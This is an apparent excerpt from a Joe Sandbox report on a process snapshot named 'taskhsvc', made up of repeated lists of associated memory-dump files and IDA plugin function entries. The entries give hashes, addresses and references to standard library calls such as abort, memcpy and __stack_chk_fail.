Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_fail_stati64free
String ID:
API String ID: 2740781178-0
Opcode ID: f028b545f4b3b1c8fc445578f7492f8252907452aac35f968ba50762fddd1917
Instruction ID: 8a92effe7de06f40f3ab6ab5d49bf7162f10f1af16a88e24dd2be08e9eb7ba24
Opcode Fuzzy Hash: f028b545f4b3b1c8fc445578f7492f8252907452aac35f968ba50762fddd1917
Instruction Fuzzy Hash: C6414A75A08A09DBEB14DF68C5407BDBBF0AF94314F145429E694FB340D3B8D982DB51

Uniqueness

Uniqueness Score: -1.00%

Function 00DB5005 Relevance: 4.6, APIs: 3, Instructions: 97COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 00DB5136
__stack_chk_fail.LIBSSP-0 ref: 00DB514C

Memory Dump Source

Source File: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_failabort
String ID:
API String ID: 3276312271-0
Opcode ID: 9b13aab838a67005c5bbe7b68bcd2acfbcfadd38a0ef5f4261299ab1092f784b
Instruction ID: 66cc26e3380ed9a5bcd3f6a13f8f332d66de7290472a388e36b8b85e49237240
Opcode Fuzzy Hash: 9b13aab838a67005c5bbe7b68bcd2acfbcfadd38a0ef5f4261299ab1092f784b
Instruction Fuzzy Hash: F6418C74A00619CFCB00EFA8C584AAEB7F0BF48300F158899E855EB316D735ED419F61

Uniqueness

Uniqueness Score: -1.00%

Function 00EB6A4B Relevance: 4.6, APIs: 3, Instructions: 94COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 00EB6AAF
abort.MSVCRT ref: 00EB6B04
__stack_chk_fail.LIBSSP-0 ref: 00EB6B81

Memory Dump Source

Source File: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: abort$__stack_chk_fail
String ID:
API String ID: 2908038143-0
Opcode ID: 42fa076e78610c47854baa80f6bfec9dd9c28e9454f2a2179585da66930ea4b4
Instruction ID: 08ab3f719fa93c1c6fdf0ee96a1c4b632414e6d25ed60feb007c37adf4c822e7
Opcode Fuzzy Hash: 42fa076e78610c47854baa80f6bfec9dd9c28e9454f2a2179585da66930ea4b4
Instruction Fuzzy Hash: 974108B4A0420A9FCB04DFA9C985AAEB7F0BF48314F15C429E894E7351D738E945CF51

Uniqueness

Uniqueness Score: -1.00%

Function 00EFEC9C Relevance: 4.6, APIs: 3, Instructions: 83COMMON

Download Yara Rule

APIs

abort.MSVCRT ref: 00EFED00

Part of subcall function 00EFD7F2: abort.MSVCRT ref: 00EFD854
Part of subcall function 00EFD7F2: abort.MSVCRT ref: 00EFD893
Part of subcall function 00EFD7F2: memcpy.MSVCRT ref: 00EFD8AD
Part of subcall function 00EFD7F2: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00DC57C7), ref: 00EFD8C0

Part of subcall function 00EFBEDA: abort.MSVCRT ref: 00EFBF43
Part of subcall function 00EFBEDA: __stack_chk_fail.LIBSSP-0 ref: 00EFC220

memset.MSVCRT ref: 00EFED1B
__stack_chk_fail.LIBSSP-0 ref: 00EFEDD9

Part of subcall function 00EE6562: strrchr.MSVCRT ref: 00EE6586
Part of subcall function 00EE6562: strrchr.MSVCRT ref: 00EE659C
Part of subcall function 00EE6562: __stack_chk_fail.LIBSSP-0 ref: 00EE6601

Part of subcall function 00EE9764: __stack_chk_fail.LIBSSP-0 ref: 00EE9857

Memory Dump Source

Source File: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_fail$abort$strrchr$memcpymemset
String ID:
API String ID: 632605181-0
Opcode ID: 91eb5ff86002d757175f51f06f3440dff3ef0fb3298b19e7b439828edac29c0e
Instruction ID: 56f0763127bf18bc4d6ccd68cb1cdb0c462fd778d465cd97097d914fc2216e89
Opcode Fuzzy Hash: 91eb5ff86002d757175f51f06f3440dff3ef0fb3298b19e7b439828edac29c0e
Instruction Fuzzy Hash: 6641C2B490430ADFCB00EFA8C5856AEBBF1BF48304F109819E994AB351D738E944DF52

Uniqueness

Uniqueness Score: -1.00%

Function 00D977B4 Relevance: 4.6, APIs: 3, Instructions: 82COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00D97841
exit.MSVCRT ref: 00D978E8
__stack_chk_fail.LIBSSP-0 ref: 00D97911

Memory Dump Source

Source File: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
